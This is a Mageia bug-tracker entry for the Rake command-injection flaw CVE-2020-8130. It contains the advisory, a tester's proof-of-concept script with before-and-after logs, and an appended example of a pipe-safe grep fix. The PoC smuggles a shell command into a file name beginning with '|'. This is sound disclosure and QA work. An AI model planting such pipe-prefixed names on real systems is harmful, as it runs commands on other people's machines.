| Summary: | ruby-rake new security issue CVE-2020-8130 | | |
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | critical | | |
| Priority: | Normal | CC: | andrewsfarm, nicolas.salguero, pterjan, sysadmin-bugs, tarazed25, tmb |
| Version: | 7 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | MGA7-64-OK | | |
| Source RPM: | ruby-rake-12.3.0-20.mga7.src.rpm | CVE: | |
| Status comment: | | | |
Description

David Walser
2020-02-27 22:45:53 CET

David Walser
2020-02-27 22:46:05 CET

No registered nor recent maintainer, so assigning globally.

Status comment: (none) => Fixed upstream in 12.3.3
Assignee: bugsquad => pkg-bugs

Nicolas Salguero
2020-03-04 14:03:53 CET

ruby 2.7.0 contains 13.0.1, so it is fine in cauldron. I will update ruby-rake in 7.

CC: (none) => nicolas.salguero

Pascal Terjan
2020-03-04 21:55:22 CET

Packages have been uploaded to 7/core/updates_testing:

ruby-rake-12.3.0-21.mga7.src.rpm
ruby-rake-12.3.0-21.mga7.noarch.rpm

A simple exploit is available on https://hackerone.com/reports/651518

Advisory:
========================

Updated ruby-rake package fixes security vulnerability:

There is an OS command injection vulnerability in Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|` (CVE-2020-8130).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130
https://www.debian.org/lts/security/2020/dla-2120

Version: Cauldron => 7
Source RPM: ruby-2.7.0-26.mga8.src.rpm => ruby-rake-12.3.0-20.mga7.src.rpm

mga7, x86_64

CVE-2020-8130
https://hackerone.com/reports/651518

```
$ cat poc_rake.rb
#!/bin/ruby
require 'rake'
list = Rake::FileList.new( Dir.glob( '*' ) )
p list
list.egrep( /something/ )
$ touch "| touch evil.txt"
$ ls -1
poc_rake.rb
report.26266
'| touch evil.txt'
```

For this test I left out the bundling stuff because I have no real idea about enabling it. The script should work without it AFAICS.

```
$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
evil.txt
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'
```

So evil.txt has been created.

Updated the package and tested the exploit again.

```
$ rm -f evil.txt
$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
#report.26266#:21:#report.26266#:10:list.egrep( /something/ )
#report.26266#:22:report.26266:10:list.egrep( /something/ )
#report.26266#:23:poc_rake.rb:6:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'
```

No more evil.txt.

Copied files from /usr/share/gems/gems/rake-12.3.0/doc/example/ to a local directory and ran rake against Rakefile2.

```ruby
$ cat Rakefile2
# Example Rakefile -*- ruby -*-

# Using the power of Ruby

task :default => [:main]

def ext(fn, newext)
  fn.sub(/\.[^.]+$/, newext)
end

SRCFILES = Dir['*.c']
OBJFILES = SRCFILES.collect { |fn| ext(fn,".o") }

OBJFILES.each do |objfile|
  srcfile = ext(objfile, ".c")
  file objfile => [srcfile] do |t|
    sh "gcc #{srcfile} -c -o #{t.name}"
  end
end

file "main" => OBJFILES do |t|
  sh "gcc -o #{t.name} main.o a.o b.o"
end

task :clean do
  rm_f FileList['*.o']
  Dir['*~'].each { |fn| rm_f fn }
end

task :clobber => [:clean] do
  rm_f "main"
end

task :run => ["main"] do
  sh "./main"
end
```

```
$ cp Rakefile2 Rakefile
$ rake clean
rm -f
$ rake run
gcc a.c -c -o a.o
gcc main.c -c -o main.o
gcc b.c -c -o b.o
gcc -o main main.o a.o b.o
./main
In function a
In function b
$ ls
a.c  b.o     main.o       Rakefile1  report.26266
a.o  main*   poc_rake.rb  Rakefile2  '| touch evil.txt'
b.c  main.c  Rakefile     '#report.26266#'
$ ./main
In function a
In function b
$ rake clean
rm -f a.o b.o main.o
```

ruby-rake can do a lot more, but this shows that the basic functions work.

CC: (none) => tarazed25

Could this be applied to political campaigns? Eliminating "evil.txt" there would be a Good Thing. For everybody.

Validating. Advisory in Comment 4.

CC: (none) => andrewsfarm, sysadmin-bugs

Thomas Backlund
2020-03-06 14:08:08 CET

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2020-0121.html

Keywords: (none) => advisory
Status: NEW => RESOLVED
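The advisory and the QA test above show the trigger (a list entry whose name begins with `|`) but not why it works: `Rake::FileList#egrep` opened each name with `Kernel#open`, which runs such a name as a command, and the upstream 12.3.3 fix switched it to `File.open`. The following is an added example, not code from this bug report or from rake: a pipe-safe grep with the same file:line:text shape, plus the check a packager could run over an untrusted file list before it reaches an unpatched rake. `safe_egrep`, `pipe_prefixed?` and `demo_in_tmpdir` are names chosen here, and the demo files are constructed.

```ruby
require "tmpdir"

# Added example, not from the Mageia bug or from rake itself: a line grep
# with Rake::FileList#egrep's output shape (file, line number, line) that
# opens every path with File.open. Kernel#open treats a leading "|" as a
# command to run and read from; File.open never does, so a list entry such
# as "| touch evil.txt" is looked up as a file name instead of executed.
def safe_egrep(filenames, pattern)
  matches = []
  filenames.each do |fn|
    begin
      File.open(fn, "r") do |inf|          # not Kernel#open
        inf.each_line.with_index(1) do |line, lineno|
          matches << [fn, lineno, line] if pattern.match(line)
        end
      end
    rescue SystemCallError => ex
      # Missing or unreadable file: report and continue, as egrep does.
      warn "Error while processing '#{fn}': #{ex.message}"
    end
  end
  matches
end

# Audit check for file lists that may still reach an unpatched rake: true
# when Kernel#open would interpret the name as a command.
def pipe_prefixed?(fn)
  fn.start_with?("|")
end

# Constructed demo: in a scratch directory, create a file whose name begins
# with "|", grep it, and report whether the injected command ran.
def demo_in_tmpdir
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      File.write("| touch evil.txt", "something here\nnothing here\n")
      File.write("poc_rake.rb", "require 'rake'\nlist.egrep( /something/ )\n")
      hits = safe_egrep(["| touch evil.txt", "poc_rake.rb"], /something/)
      { hits: hits, evil_created: File.exist?("evil.txt") }  # evil_created: false
    end
  end
end
```

With the pipe-named file read as data, its own contents appear in the hits and no evil.txt is created, which is the behaviour the updated package showed in the test log above.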